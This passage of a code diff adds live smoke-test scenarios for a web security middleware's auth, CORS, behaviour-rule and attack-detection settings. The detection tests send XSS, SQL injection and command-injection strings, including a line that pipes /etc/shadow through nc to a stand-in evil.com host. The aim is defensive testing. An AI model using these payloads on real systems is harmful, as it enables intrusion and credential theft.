+
+AGENT_ENCRYPTION_CONFIG = {
+    "enable_agent": True,
+    "agent_api_key": AGENT_API_KEY,
+    "agent_endpoint": AGENT_ENDPOINT,
+    "agent_project_encryption_key": ENCRYPTION_KEY,
+    "agent_retry_attempts": 0,
+    "agent_flush_interval": 2,
+    "excluded_detection_headers": EXCLUDED_HEADERS,
+}
+
+
+@scenario(
+    covers={"agent_project_encryption_key"},
+    config=AGENT_ENCRYPTION_CONFIG,
+)
+def agent_project_encryption_key_targets_encrypted_endpoint(
+    ctx: ScenarioContext,
+) -> None:
+    _reset_agent(ctx)
+    mark = ctx.stack.logs.mark()
+
+    ctx.client.get("/basic/ip", params={"q": "hello"}, headers=BADBOT_HEADERS)
+
+    rejected = wait_until(
+        lambda: _lines_containing(ctx, mark, "permanently rejected (404)"),
+        timeout=15.0,
+    )
+    assert rejected, (
+        "agent_project_encryption_key should route events to "
+        "/api/v1/events/encrypted, which this stub does not implement (404)"
+    )
+
+    state = _debug_state(ctx)
+    assert state is not None and state.get("events") == [], (
+        "the plain agent stub must never decode an encrypted payload"
+    )
+
+
+AGENT_INTERVAL_CONFIG = {
+    "enable_agent": True,
+    "agent_api_key": AGENT_API_KEY,
+    "agent_endpoint": AGENT_ENDPOINT,
+    "agent_status_interval": 60,
+    "enable_dynamic_rules": True,
+    "dynamic_rule_interval": 60,
+    "agent_flush_interval": 5,
+    "excluded_detection_headers": EXCLUDED_HEADERS,
+}
+
+
+@scenario(
+    covers={"agent_status_interval", "dynamic_rule_interval"},
+    config=AGENT_INTERVAL_CONFIG,
+)
+def agent_status_and_dynamic_rule_interval_cadence(ctx: ScenarioContext) -> None:
+    _reset_agent(ctx)
+
+    first_fetch = wait_until(lambda: _rule_apply_count(ctx) >= 1, timeout=40.0)
+    assert first_fetch, "no initial dynamic-rule fetch happened at startup"
+
+    too_soon = wait_until(lambda: _rule_apply_count(ctx) >= 2, timeout=8.0)
+    assert not too_soon, (
+        "dynamic_rule_interval=60 should not refire within 8s of the first fetch"
+    )
+
+    state = wait_until(lambda: _state_with_status(ctx), timeout=90.0)
+    assert state is not None, (
+        "agent_status_interval=60 should have posted a status report to the "
+        "agent stub by now"
+    )

--- a/tests/live_smoke/scenarios/auth_and_headers.py
+++ b/tests/live_smoke/scenarios/auth_and_headers.py
@@ -1,0 +1,105 @@
+from datetime import datetime, timezone
+
+from tests.live_smoke.driver import ScenarioContext
+from tests.live_smoke.registry import scenario
+
+EXCLUDED_HEADERS = ["x-real-ip", "x-forwarded-for"]
+
+AUTH_BASE_CONFIG = {"excluded_detection_headers": EXCLUDED_HEADERS}
+
+
+@scenario(covers={"require_headers"}, config=AUTH_BASE_CONFIG)
+def require_headers_decorator_enforces_exact_values(ctx: ScenarioContext) -> None:
+    client = ctx.client
+
+    missing = client.get("/auth/custom-headers")
+    assert missing.status_code == 400
+
+    mismatched = client.get(
+        "/auth/custom-headers",
+        headers={"X-Custom-Header": "wrong-value", "X-Client-ID": "required-value"},
+    )
+    assert mismatched.status_code == 400
+
+    matched = client.get(
+        "/auth/custom-headers",
+        headers={
+            "X-Custom-Header": "required-value",
+            "X-Client-ID": "required-value",
+        },
+    )
+    assert matched.status_code == 200
+
+
+@scenario(
+    covers={"api_key_auth", "required_headers", "authentication"},
+    config=AUTH_BASE_CONFIG,
+)
+def api_key_auth_treats_required_header_as_presence_only(
+    ctx: ScenarioContext,
+) -> None:
+    client = ctx.client
+
+    missing = client.get("/auth/api-key")
+    assert missing.status_code == 400
+
+    present = client.get(
+        "/auth/api-key", headers={"X-API-Key": "smoke-arbitrary-value"}
+    )
+    assert present.status_code == 200
+
+
+@scenario(covers={"auth_verifier", "authentication"}, config=AUTH_BASE_CONFIG)
+def bearer_auth_uses_the_configured_auth_verifier(ctx: ScenarioContext) -> None:
+    client = ctx.client
+
+    missing = client.get("/auth/bearer-auth")
+    assert missing.status_code == 401
+
+    present = client.get(
+        "/auth/bearer-auth", headers={"Authorization": "Bearer smoke-token"}
+    )
+    assert present.status_code == 200
+
+
+@scenario(covers={"require_referrer", "referrer"}, config=AUTH_BASE_CONFIG)
+def require_referrer_enforces_scheme_prefixed_origins(ctx: ScenarioContext) -> None:
+    client = ctx.client
+
+    missing = client.get("/content/referrer-check")
+    assert missing.status_code == 403
+
+    invalid = client.get(
+        "/content/referrer-check", headers={"Referer": "https://evil.example"}
+    )
+    assert invalid.status_code == 403
+
+    valid = client.get(
+        "/content/referrer-check", headers={"Referer": "https://example.com/page"}
+    )
+    assert valid.status_code == 200
+
+
+def _business_hours_expected_status() -> int:
+    current = datetime.now(timezone.utc).strftime("%H:%M")
+    return 200 if "09:00" <= current <= "17:00" else 403
+
+
+@scenario(covers={"time_window"}, config=AUTH_BASE_CONFIG)
+def time_window_restricts_access_to_business_hours(ctx: ScenarioContext) -> None:
+    response = ctx.client.get("/advanced/business-hours")
+    assert response.status_code == _business_hours_expected_status()
+
+
+HTTPS_CONFIG = {"enforce_https": True, "excluded_detection_headers": EXCLUDED_HEADERS}
+
+
+@scenario(covers={"https_enforcement", "require_https"}, config=HTTPS_CONFIG)
+def https_enforcement_redirects_plain_http_requests(ctx: ScenarioContext) -> None:
+    client = ctx.client
+
+    global_redirect = client.get("/basic/ip", params={"q": "hello"})
+    assert global_redirect.status_code == 301
+
+    decorator_redirect = client.get("/auth/https-only")
+    assert decorator_redirect.status_code == 301

--- a/tests/live_smoke/scenarios/behavior_rules.py
+++ b/tests/live_smoke/scenarios/behavior_rules.py
@@ -1,0 +1,149 @@
+import json
+
+from tests.live_smoke.driver import ScenarioContext, wait_until
+from tests.live_smoke.registry import scenario
+
+_BASE = {
+    "auto_ban_threshold": 1000,
+    "rate_limit": 1000,
+    "excluded_detection_headers": ["x-real-ip", "x-forwarded-for"],
+}
+
+
+def _lines_mentioning(ctx: ScenarioContext, mark: str, needle: str) -> list[str]:
+    return [line for line in ctx.stack.logs.lines_since(mark) if needle in line]
+
+
+def _unique_config(rate_limit: int) -> dict[str, object]:
+    return {**_BASE, "rate_limit": rate_limit}
+
+
+@scenario(covers={"usage_monitor"}, config=_unique_config(1101))
+def usage_monitor_logs_without_blocking(ctx: ScenarioContext) -> None:
+    mark = ctx.stack.logs.mark()
+
+    for _ in range(11):
+        response = ctx.client.get("/behavior/usage-monitor")
+        assert response.status_code == 200, (
+            f"usage_monitor(action='log') blocked a request: {response.status_code}"
+        )
+
+    assert _lines_mentioning(
+        ctx, mark, "Behavioral anomaly detected: Usage threshold exceeded: 10 calls"
+    ), "usage_monitor never logged the threshold-exceeded warning"
+
+
+@scenario(covers={"suspicious_frequency"}, config=_unique_config(1102))
+def suspicious_frequency_throttle_logs_without_blocking(ctx: ScenarioContext) -> None:
+    mark = ctx.stack.logs.mark()
+
+    for _ in range(10):
+        response = ctx.client.get("/behavior/suspicious-frequency")
+        assert response.status_code == 200, (
+            "suspicious_frequency(action='throttle') blocked a request: "
+            f"{response.status_code}"
+        )
+
+    assert _lines_mentioning(ctx, mark, "Throttling IP"), (
+        "suspicious_frequency never logged a throttle warning"
+    )
+
+
+@scenario(covers={"honeypot_detection"}, config=_unique_config(1103))
+def honeypot_detection_blocks_bot_filled_field(ctx: ScenarioContext) -> None:
+    clean = ctx.client.post("/advanced/honeypot", json={"input": "hello"})
+    assert clean.status_code == 200, (
+        f"honeypot_detection blocked a clean submission: {clean.status_code}"
+    )
+
+    filled = ctx.client.post(
+        "/advanced/honeypot",
+        json={"input": "hello", "honeypot_field": "bot-filled-this"},
+    )
+    assert filled.status_code == 403, (
+        f"honeypot_detection did not block a filled honeypot field: "
+        f"{filled.status_code}"
+    )
+
+
+@scenario(covers={"return_monitor"}, config=_unique_config(1104))
+def return_monitor_decorator_allows_non_matching_status(
+    ctx: ScenarioContext,
+) -> None:
+    for _ in range(4):
+        response = ctx.client.get("/behavior/return-monitor/200")
+        assert response.status_code == 200, (
+            "return_monitor(pattern='status:404') interfered with a "
+            f"non-matching status: {response.status_code}"
+        )
+
+
+@scenario(covers={"behavior_analysis"}, config=_unique_config(1105))
+def behavior_analysis_logs_frequency_rule_violation(ctx: ScenarioContext) -> None:
+    mark = ctx.stack.logs.mark()
+
+    for _ in range(11):
+        response = ctx.client.post("/behavior/behavior-rules")
+        assert response.status_code == 200, (
+            "behavior_analysis's frequency rule (action='throttle') blocked a "
+            f"request: {response.status_code}"
+        )
+
+    assert _lines_mentioning(ctx, mark, "Usage threshold exceeded: 10 calls in 60s"), (
+        "behavior_analysis never logged the frequency rule violation"
+    )
+
+
+_GLOBAL_RULE_CONFIG = {
+    **_BASE,
+    "behavior_scan_response_body": True,
+    "behavior_max_response_body_inspect_bytes": 65536,
+    "global_behavior_rules": [
+        {
+            "rule_type": "return_pattern",
+            "threshold": 3,
+            "window": 60,
+            "pattern": "json:message==Echo response",
+            "action": "ban",
+            "ban_duration": 30,
+        }
+    ],
+}
+
+
+def _echo_status(ctx: ScenarioContext) -> int:
+    return ctx.client.post("/basic/echo", json={"note": "hello"}).status_code
+
+
+def _banned(ctx: ScenarioContext) -> bool:
+    return _echo_status(ctx) == 403
+
+
+@scenario(
+    covers={
+        "global_behavior_rules",
+        "behavior_scan_response_body",
+        "behavior_max_response_body_inspect_bytes",
+    },
+    config=_GLOBAL_RULE_CONFIG,
+)
+def global_behavior_rules_bans_after_response_body_pattern_match(
+    ctx: ScenarioContext,
+) -> None:
+    mark = ctx.stack.logs.mark()
+
+    for _ in range(4):
+        _echo_status(ctx)
+
+    banned = wait_until(lambda: _banned(ctx), timeout=10.0)
+    assert banned, "global_behavior_rules never banned the client after 4 matches"
+
+    matched = _lines_mentioning(
+        ctx,
+        mark,
+        "Global return pattern threshold exceeded: 3 for 'json:message==Echo response'",
+    )
+    assert matched, (
+        "no log line recorded the global return_pattern rule match; "
+        f"recent lines: {json.dumps(ctx.stack.logs.lines_since(mark)[-10:])}"
+    )

--- a/tests/live_smoke/scenarios/content_and_cors.py
+++ b/tests/live_smoke/scenarios/content_and_cors.py
@@ -1,0 +1,259 @@
+from tests.live_smoke.driver import ScenarioContext
+from tests.live_smoke.registry import scenario
+
+_BASE = {
+    "auto_ban_threshold": 1000,
+    "rate_limit": 1000,
+    "excluded_detection_headers": ["x-real-ip", "x-forwarded-for"],
+}
+
+
+def _unique_config(rate_limit: int) -> dict[str, object]:
+    return {**_BASE, "rate_limit": rate_limit}
+
+
+@scenario(
+    covers={"max_request_size", "request_size_content"}, config=_unique_config(1201)
+)
+def max_request_size_decorator_blocks_oversized_body(ctx: ScenarioContext) -> None:
+    within_limit = ctx.client.post("/content/size-limit", json={"data": "x" * 100})
+    assert within_limit.status_code == 200, (
+        f"a body under max_request_size was blocked: {within_limit.status_code}"
+    )
+
+    oversized = ctx.client.post(
+        "/content/size-limit", json={"data": "x" * (1024 * 100 + 1)}
+    )
+    assert oversized.status_code == 413, (
+        f"a body over max_request_size was not blocked: {oversized.status_code}"
+    )
+
+
+@scenario(covers={"content_type_filter"}, config=_unique_config(1202))
+def content_type_filter_decorator_blocks_disallowed_content_type(
+    ctx: ScenarioContext,
+) -> None:
+    allowed = ctx.client.post(
+        "/content/json-only",
+        content=b'{"hello": "world"}',
+        headers={"Content-Type": "application/json"},
+    )
+    assert allowed.status_code == 200, (
+        f"content_type_filter blocked an allowed content type: {allowed.status_code}"
+    )
+
+    disallowed = ctx.client.post(
+        "/content/json-only",
+        content=b"hello=world",
+        headers={"Content-Type": "text/plain"},
+    )
+    assert disallowed.status_code == 415, (
+        "content_type_filter did not block a disallowed content type: "
+        f"{disallowed.status_code}"
+    )
+
+
+@scenario(
+    covers={"custom_validation", "custom_validators"}, config=_unique_config(1203)
+)
+def custom_validation_decorator_blocks_matching_user_agent(
+    ctx: ScenarioContext,
+) -> None:
+    clean = ctx.client.get(
+        "/content/custom-validation", headers={"User-Agent": "regular-client"}
+    )
+    assert clean.status_code == 200, (
+        f"custom_validation blocked a non-matching user agent: {clean.status_code}"
+    )
+
+    matching = ctx.client.get(
+        "/content/custom-validation",
+        headers={"User-Agent": "suspicious-pattern-bot"},
+    )
+    assert matching.status_code == 403, (
+        f"custom_validation did not block a matching user agent: {matching.status_code}"
+    )
+
+
+@scenario(covers={"custom_request"}, config=_unique_config(1204))
+def custom_request_hook_blocks_debug_flag(ctx: ScenarioContext) -> None:
+    clean = ctx.client.get("/basic/ip", params={"q": "hello"})
+    assert clean.status_code == 200, (
+        f"a plain request was blocked by the custom_request hook: {clean.status_code}"
+    )
+
+    debug = ctx.client.get("/basic/ip", params={"debug": "true"})
+    assert debug.status_code == 403, (
+        f"custom_request did not block ?debug=true: {debug.status_code}"
+    )
+
+
+@scenario(
+    covers={"route_config", "get_route_config"},
+    config={**_BASE, "route_resolution_strict": True},
+)
+def route_config_strict_mode_blocks_unresolved_route(ctx: ScenarioContext) -> None:
+    mark = ctx.stack.logs.mark()
+
+    resolved = ctx.client.get("/content/no-bots")
+    assert resolved.status_code == 200, (
+        "route_resolution_strict blocked a normally-resolvable decorated route: "
+        f"{resolved.status_code}"
+    )
+
+    unresolved = ctx.client.get("/this-path-does-not-exist-anywhere")
+    assert unresolved.status_code == 500, (
+        "route_resolution_strict did not turn an unresolved path into a 500: "
+        f"{unresolved.status_code}"
+    )
+
+    lines = ctx.stack.logs.lines_since(mark)
+    assert any(
+        "Route resolution failed; per-route decorator config could not be applied"
+        in line
+        for line in lines
+    ), "no route_config unresolved-route warning was logged"
+
+
+_CORS_CONFIG = {
+    **_BASE,
+    "cors_allow_origins": ["https://allowed.example.com"],
+    "cors_allow_methods": ["GET"],
+    "cors_allow_headers": ["*"],
+    "cors_allow_credentials": False,
+    "cors_expose_headers": ["x-total-count"],
+    "cors_max_age": 120,
+}
+
+
+def _assert_allowed_preflight(ctx: ScenarioContext) -> None:
+    response = ctx.client.options(
+        "/basic/ip",
+        headers={
+            "Origin": "https://allowed.example.com",
+            "Access-Control-Request-Method": "GET",
+            "Access-Control-Request-Headers": "x-custom-header",
+        },
+    )
+    assert response.status_code == 200, (
+        "a preflight from an allowed origin/method/header was rejected: "
+        f"{response.status_code} {response.text}"
+    )
+    assert (
+        response.headers.get("access-control-allow-origin")
+        == "https://allowed.example.com"
+    )
+    assert response.headers.get("access-control-allow-methods") == "GET"
+    assert response.headers.get("access-control-max-age") == "120"
+    assert response.headers.get("access-control-allow-headers") == "x-custom-header"
+
+
+def _assert_disallowed_preflight(ctx: ScenarioContext) -> None:
+    response = ctx.client.options(
+        "/basic/ip",
+        headers={
+            "Origin": "https://evil.example.com",
+            "Access-Control-Request-Method": "GET",
+        },
+    )
+    assert response.status_code == 400, (
+        f"a preflight from a disallowed origin was accepted: {response.status_code}"
+    )
+    assert "access-control-allow-origin" not in response.headers
+
+
+def _assert_simple_allowed_origin(ctx: ScenarioContext) -> None:
+    response = ctx.client.get(
+        "/basic/ip",
+        params={"q": "hello"},
+        headers={"Origin": "https://allowed.example.com"},
+    )
+    assert response.status_code == 200
+    assert (
+        response.headers.get("access-control-allow-origin")
+        == "https://allowed.example.com"
+    )
+    assert response.headers.get("access-control-expose-headers") == "x-total-count"
+
+
+def _assert_simple_disallowed_origin(ctx: ScenarioContext) -> None:
+    response = ctx.client.get(
+        "/basic/ip",
+        params={"q": "hello"},
+        headers={"Origin": "https://evil.example.com"},
+    )
+    assert response.status_code == 200
+    assert "access-control-allow-origin" not in response.headers
+
+
+@scenario(
+    covers={
+        "enable_cors",
+        "cors_allow_origins",
+        "cors_allow_methods",
+        "cors_allow_headers",
+        "cors_expose_headers",
+        "cors_max_age",
+        "request_logging",
+    },
+    config=_CORS_CONFIG,
+)
+def cors_settings_control_preflight_and_simple_responses(
+    ctx: ScenarioContext,
+) -> None:
+    mark = ctx.stack.logs.mark()
+
+    _assert_allowed_preflight(ctx)
+    _assert_disallowed_preflight(ctx)
+    _assert_simple_allowed_origin(ctx)
+    _assert_simple_disallowed_origin(ctx)
+
+    lines = ctx.stack.logs.lines_since(mark)
+    assert any("Request from" in line for line in lines), (
+        "request_logging never produced a 'Request from' line"
+    )
+
+
+@scenario(
+    covers={"cors_allow_credentials"},
+    config={
+        **_BASE,
+        "cors_allow_origins": ["https://allowed.example.com"],
+        "cors_allow_credentials": True,
+    },
+)
+def cors_allow_credentials_adds_credentials_header(ctx: ScenarioContext) -> None:
+    response = ctx.client.get(
+        "/basic/ip",
+        params={"q": "hello"},
+        headers={"Origin": "https://allowed.example.com"},
+    )
+    assert response.status_code == 200
+    assert response.headers.get("access-control-allow-credentials") == "true", (
+        "cors_allow_credentials=True did not add the credentials header"
+    )
+
+
+_SECURITY_HEADERS_OVERRIDE = {
+    "enabled": True,
+    "hsts": {"max_age": 31536000, "include_subdomains": True, "preload": False},
+    "csp": None,
+    "frame_options": "SAMEORIGIN",
+    "content_type_options": "nosniff",
+    "xss_protection": "1; mode=block",
+    "referrer_policy": "strict-origin-when-cross-origin",
+    "permissions_policy": "geolocation=(), microphone=(), camera=()",
+    "custom": {"X-Smoke-Test": "yes"},
+}
+
+
+@scenario(
+    covers={"security_headers"},
+    config={**_BASE, "security_headers": _SECURITY_HEADERS_OVERRIDE},
+)
+def security_headers_override_reflected_in_response(ctx: ScenarioContext) -> None:
+    response = ctx.client.get("/basic/health")
+    assert response.status_code == 200
+    assert response.headers.get("x-smoke-test") == "yes", (
+        "security_headers.custom was not applied to the response"
+    )

--- a/tests/live_smoke/scenarios/detection_engine.py
+++ b/tests/live_smoke/scenarios/detection_engine.py
@@ -1,0 +1,410 @@
+import json
+
+import httpx
+
+from tests.live_smoke.driver import ScenarioContext, wait_until
+from tests.live_smoke.registry import scenario
+
+_BASE = {
+    "auto_ban_threshold": 1000,
+    "rate_limit": 1000,
+    "excluded_detection_headers": ["x-real-ip", "x-forwarded-for"],
+}
+
+_XSS = "<script>alert(1)</script>"
+_SQLI = "' UNION SELECT password FROM admin--"
+
+
+def _echo(client: httpx.Client, body: dict[str, object]) -> httpx.Response:
+    return client.post("/basic/echo", json=body)
+
+
+@scenario(
+    covers={"enable_penetration_detection"},
+    config={**_BASE, "enable_penetration_detection": False},
+)
+def enable_penetration_detection_toggle(ctx: ScenarioContext) -> None:
+    response = _echo(ctx.client, {"note": _XSS, "query": _SQLI})
+    assert response.status_code == 200, (
+        "enable_penetration_detection=False still blocked an attack payload: "
+        f"{response.status_code}"
+    )
+
+
+@scenario(
+    covers={"enabled_detection_categories", "suspicious_activity"},
+    config={
+        **_BASE,
+        "enabled_detection_categories": ["xss"],
+        "detection_semantic_threshold": 1.0,
+    },
+)
+def enabled_detection_categories_narrows_scan(ctx: ScenarioContext) -> None:
+    sqli_only = _echo(ctx.client, {"note": _SQLI})
+    assert sqli_only.status_code == 200, (
+        "enabled_detection_categories=['xss'] still blocked a sqli-only payload: "
+        f"{sqli_only.status_code}"
+    )
+
+    xss = _echo(ctx.client, {"note": _XSS})
+    assert xss.status_code == 400, (
+        "enabled_detection_categories=['xss'] did not block an xss payload: "
+        f"{xss.status_code}"
+    )
+
+
+@scenario(
+    covers={"excluded_detection_params", "excluded_detection_body_fields"},
+    config={
+        **_BASE,
+        "excluded_detection_params": ["safe_q"],
+        "excluded_detection_body_fields": ["safe_field"],
+    },
+)
+def excluded_detection_params_and_body_fields_skip_scanning(
+    ctx: ScenarioContext,
+) -> None:
+    excluded_param = ctx.client.post(
+        "/basic/echo", params={"safe_q": _XSS}, json={"note": "hello"}
+    )
+    assert excluded_param.status_code == 200, (
+        "excluded_detection_params did not let an attack through the named param: "
+        f"{excluded_param.status_code}"
+    )
+
+    scanned_param = ctx.client.post(
+        "/basic/echo", params={"other_q": _XSS}, json={"note": "hello"}
+    )
+    assert scanned_param.status_code == 400, (
+        f"a non-excluded query param stopped being scanned: {scanned_param.status_code}"
+    )
+
+    excluded_field = _echo(ctx.client, {"safe_field": _XSS})
+    assert excluded_field.status_code == 200, (
+        "excluded_detection_body_fields did not let an attack through the named "
+        f"field: {excluded_field.status_code}"
+    )
+
+    scanned_field = _echo(ctx.client, {"other_field": _XSS})
+    assert scanned_field.status_code == 400, (
+        f"a non-excluded body field stopped being scanned: {scanned_field.status_code}"
+    )
+
+
+@scenario(
+    covers={"detection_scan_body"}, config={**_BASE, "detection_scan_body": False}
+)
+def detection_scan_body_disabled_skips_body_only(ctx: ScenarioContext) -> None:
+    body_attack = _echo(ctx.client, {"note": _XSS})
+    assert body_attack.status_code == 200, (
+        "detection_scan_body=False still blocked a body-only attack: "
+        f"{body_attack.status_code}"
+    )
+
+    param_attack = ctx.client.post(
+        "/basic/echo", params={"q": _XSS}, json={"note": "hello"}
+    )
+    assert param_attack.status_code == 400, (
+        "detection_scan_body=False also stopped scanning query params: "
+        f"{param_attack.status_code}"
+    )
+
+
+def _lines_mentioning(ctx: ScenarioContext, mark: str, needle: str) -> list[str]:
+    return [line for line in ctx.stack.logs.lines_since(mark) if needle in line]
+
+
+@scenario(
+    covers={"detection_max_scan_values"},
+    config={**_BASE, "detection_max_scan_values": 2},
+)
+def detection_max_scan_values_caps_remaining_fields(ctx: ScenarioContext) -> None:
+    mark = ctx.stack.logs.mark()
+
+    response = _echo(ctx.client, {"field1": "hello", "field2": _XSS})
+    assert response.status_code == 200, (
+        "detection_max_scan_values=2 still caught an attack past the value budget: "
+        f"{response.status_code}"
+    )
+
+    assert _lines_mentioning(ctx, mark, "detection_max_scan_values (2) reached"), (
+        "no detection_max_scan_values warning was logged"
+    )
+
+
+@scenario(
+    covers={"detection_max_scan_chars"},
+    config={**_BASE, "detection_max_scan_chars": 1024},
+)
+def detection_max_scan_chars_caps_remaining_values(ctx: ScenarioContext) -> None:
+    mark = ctx.stack.logs.mark()
+    filler = (
+        "the quick brown fox jumps over the lazy dog and runs away fast today " * 20
+    )[:1100]
+
+    response = _echo(ctx.client, {"filler": filler, "attack": _XSS})
+    assert response.status_code == 200, (
+        "detection_max_scan_chars=1024 still caught an attack past the char budget: "
+        f"{response.status_code}"
+    )
+
+    assert _lines_mentioning(ctx, mark, "detection_max_scan_chars (1024) reached"), (
+        "no detection_max_scan_chars warning was logged"
+    )
+
+
+@scenario(
+    covers={"detection_max_json_depth"},
+    config={**_BASE, "detection_max_json_depth": 1},
+)
+def detection_max_json_depth_scans_capped_subtree_as_text(
+    ctx: ScenarioContext,
+) -> None:
+    mark = ctx.stack.logs.mark()
+
+    response = _echo(ctx.client, {"outer": {"inner": _XSS}})
+    assert response.status_code == 400, (
+        "detection_max_json_depth=1 let an attack below the cap escape detection "
+        f"entirely instead of falling back to text scanning: {response.status_code}"
+    )
+
+    assert _lines_mentioning(ctx, mark, "detection_max_json_depth (1) reached"), (
+        "no detection_max_json_depth warning was logged"
+    )
+
+
+_STRADDLE_FILLER = (
+    "the quick brown fox jumps over the lazy dog and runs away fast today "
+    "while birds sing softly near the old wooden bridge "
+)
+
+
+@scenario(
+    covers={"detection_max_body_inspect_bytes"},
+    config={**_BASE, "detection_max_body_inspect_bytes": 1024},
+)
+def detection_max_body_inspect_bytes_limits_body_read(ctx: ScenarioContext) -> None:
+    mark = ctx.stack.logs.mark()
+    near_boundary = (_STRADDLE_FILLER * 20)[:1050] + _XSS
+    near = _echo(ctx.client, {"note": near_boundary})
+    assert near.status_code == 400, (
+        "an attack just past detection_max_body_inspect_bytes, within the "
+        f"straddle-overlap window, was missed: {near.status_code}"
+    )
+
+    far_boundary = (_STRADDLE_FILLER * 60)[:2000] + _XSS
+    far = _echo(ctx.client, {"note": far_boundary})
+    assert far.status_code == 200, (
+        "an attack well past detection_max_body_inspect_bytes plus the "
+        f"straddle-overlap window was still detected: {far.status_code}"
+    )
+
+    assert _lines_mentioning(
+        ctx, mark, "detection_max_body_inspect_bytes (1024) reached"
+    ), "no detection_max_body_inspect_bytes warning was logged"
+
+
+_SEMANTIC_FILLER = (
+    "the quick brown fox jumps over the lazy dog and runs away fast today "
+    "while birds sing softly in the morning breeze near the old wooden bridge "
+)
+_SEMANTIC_SALAD = (
+    "eval exec system shell bash cmd sudo wget curl script javascript onerror "
+    "onload alert document object select union insert update delete drop from "
+    "where render template jinja mustache handlebars "
+)
+
+
+@scenario(
+    covers={"detection_max_content_length"},
+    config={
+        **_BASE,
+        "detection_max_content_length": 1000,
+        "detection_semantic_threshold": 0.3,
+    },
+)
+def detection_max_content_length_bounds_semantic_window(ctx: ScenarioContext) -> None:
+    filler = (_SEMANTIC_FILLER * 20)[:1000]
+
+    filler_alone = _echo(ctx.client, {"note": filler})
+    assert filler_alone.status_code == 200, (
+        f"plain filler text was flagged as a threat: {filler_alone.status_code}"
+    )
+
+    salad_within_window = _echo(ctx.client, {"note": _SEMANTIC_SALAD})
+    assert salad_within_window.status_code == 400, (
+        "a keyword-dense payload within the semantic window was not flagged: "
+        f"{salad_within_window.status_code}"
+    )
+
+    salad_past_window = _echo(ctx.client, {"note": filler + _SEMANTIC_SALAD})
+    assert salad_past_window.status_code == 200, (
+        "detection_max_content_length did not bound the semantic analyzer's "
+        f"input window: {salad_past_window.status_code}"
+    )
+
+
+@scenario(
+    covers={"detection_semantic_threshold"},
+    config={**_BASE, "detection_semantic_threshold": 1.0},
+)
+def detection_semantic_threshold_raised_suppresses_borderline_hit(
+    ctx: ScenarioContext,
+) -> None:
+    response = _echo(ctx.client, {"note": _SEMANTIC_SALAD})
+    assert response.status_code == 200, (
+        "detection_semantic_threshold=1.0 still flagged a borderline semantic "
+        f"payload: {response.status_code}"
+    )
+
+
+@scenario(
+    covers={"detection_threat_score_threshold"},
+    config={
+        **_BASE,
+        "detection_threat_score_threshold": 10.0,
+        "detection_semantic_threshold": 1.0,
+    },
+)
+def detection_threat_score_threshold_raised_suppresses_single_match(
+    ctx: ScenarioContext,
+) -> None:
+    response = _echo(ctx.client, {"note": _XSS})
+    assert response.status_code == 200, (
+        "detection_threat_score_threshold=10.0 still blocked a single "
+        f"weight-1.0 regex match: {response.status_code}"
+    )
+
+
+def _query_attack_past_cap() -> str:
+    filler = (
+        "the quick brown fox jumps over the lazy dog and runs away fast today "
+        "while birds sing softly " * 20
+    )[:2000]
+    return filler + _XSS
+
+
+@scenario(
+    covers=set(),
+    config={
+        **_BASE,
+        "detection_max_body_inspect_bytes": 1024,
+        "detection_preserve_attack_patterns": False,
+    },
+)
+def detection_preserve_attack_patterns_false_drops_boundary_attack(
+    ctx: ScenarioContext,
+) -> None:
+    response = ctx.client.get("/basic/ip", params={"q": _query_attack_past_cap()})
+    assert response.status_code == 200, (
+        "detection_preserve_attack_patterns=False still recovered an attack "
+        f"beyond the simple-truncation boundary: {response.status_code}"
+    )
+
+
+@scenario(
+    covers={"detection_preserve_attack_patterns"},
+    config={
+        **_BASE,
+        "detection_max_body_inspect_bytes": 1024,
+        "detection_preserve_attack_patterns": True,
+    },
+)
+def detection_preserve_attack_patterns_true_recovers_boundary_attack(
+    ctx: ScenarioContext,
+) -> None:
+    response = ctx.client.get("/basic/ip", params={"q": _query_attack_past_cap()})
+    assert response.status_code == 400, (
+        "detection_preserve_attack_patterns=True did not preserve an attack "
+        f"region beyond the truncation boundary: {response.status_code}"
+    )
+
+
+_ANOMALY_CONFIG = {
+    **_BASE,
+    "enable_agent": True,
+    "agent_api_key": "smoke-agent-key",
+    "agent_endpoint": "http://agent-stub:8090",
+    "agent_flush_interval": 1,
+    "detection_slow_pattern_threshold": 0.01,
+    "detection_anomaly_threshold": 1.0,
+    "detection_min_samples_for_anomaly": 10,
+    "detection_monitor_history_size": 100,
+    "detection_max_tracked_patterns": 100,
+    "detection_anomaly_emission_cooldown": 1.0,
+}
+
+_ANOMALY_FRAGMENT = (
+    "' OR '1'='1'; SELECT * FROM users WHERE id=1 UNION SELECT password FROM "
+    "admin-- <script>alert(document.cookie)</script> ../../etc/passwd; "
+    "cat /etc/shadow | nc evil.com 4444 $(whoami) `id` {{7*7}} onerror=alert(1) "
+    "javascript:eval(atob('x')) "
+)
+
+
+def _anomaly_payload() -> str:
+    filler = (_STRADDLE_FILLER * 200)[:9000]
+    return filler + _ANOMALY_FRAGMENT * 5 + filler
+
+
+def _agent_events(ctx: ScenarioContext) -> list[dict[str, object]]:
+    response = ctx.agent.get("/_debug/state")
+    if response.status_code != 200:
+        return []
+    data: dict[str, object] = response.json()
+    events = data.get("events", [])
+    return events if isinstance(events, list) else []
+
+
+def _anomaly_event_types_seen(ctx: ScenarioContext) -> set[str] | None:
+    types = {
+        str(event.get("event_type"))
+        for event in _agent_events(ctx)
+        if str(event.get("event_type", "")).startswith("pattern_anomaly_")
+    }
+    needed = {"pattern_anomaly_slow_execution", "pattern_anomaly_statistical_anomaly"}
+    return types if needed & types else None
+
+
+@scenario(
+    covers={
+        "detection_slow_pattern_threshold",
+        "detection_anomaly_threshold",
+        "detection_min_samples_for_anomaly",
+        "detection_monitor_history_size",
+        "detection_max_tracked_patterns",
+        "detection_anomaly_emission_cooldown",
+    },
+    config=_ANOMALY_CONFIG,
+)
+def detection_performance_monitor_emits_anomaly_telemetry(
+    ctx: ScenarioContext,
+) -> None:
+    ctx.agent.post("/_debug/reset")
+    payload = _anomaly_payload()
+    for _ in range(20):
+        _echo(ctx.client, {"note": payload})
+
+    seen = wait_until(lambda: _anomaly_event_types_seen(ctx), timeout=30.0)
+    assert seen, (
+        "no pattern_anomaly_* telemetry reached the agent stub within 20s; "
+        f"events so far: {json.dumps(_agent_events(ctx))[:2000]}"
+    )
+    assert "pattern_anomaly_slow_execution" in seen, (
+        "detection_slow_pattern_threshold never produced a slow_execution "
+        f"anomaly event: {seen}"
+    )
+
+
+@scenario(covers={"suspicious_detection"}, config={**_BASE, "rate_limit": 1301})
+def suspicious_detection_decorator_blocks_flagged_route(ctx: ScenarioContext) -> None:
+    clean = ctx.client.get("/advanced/suspicious-patterns", params={"query": "hello"})
+    assert clean.status_code == 200, (
